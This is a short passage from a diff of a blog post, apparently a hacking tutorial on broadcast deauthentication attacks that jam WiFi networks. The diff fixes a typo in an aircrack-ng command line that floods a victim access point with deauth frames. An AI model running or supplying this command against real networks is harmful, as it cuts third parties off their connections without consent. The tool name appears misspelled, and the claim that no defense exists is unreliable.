isislovecruft/patternsinthevoid/content/hacking/broadcast-de-auth-dos-attack-jamming-wifi-networks.md

 monitoring, and simply the aircrack-ng suite of tools.
 The command for it is

-    airplay-ng --death 0 -a [BSSID of victim network access point] mon0
+    airplay-ng --deauth 0 -a [BSSID of victim network access point] mon0

 There's no way to defend against this type of attack, but the victim(s) could triangulate your position using the frequency strength of your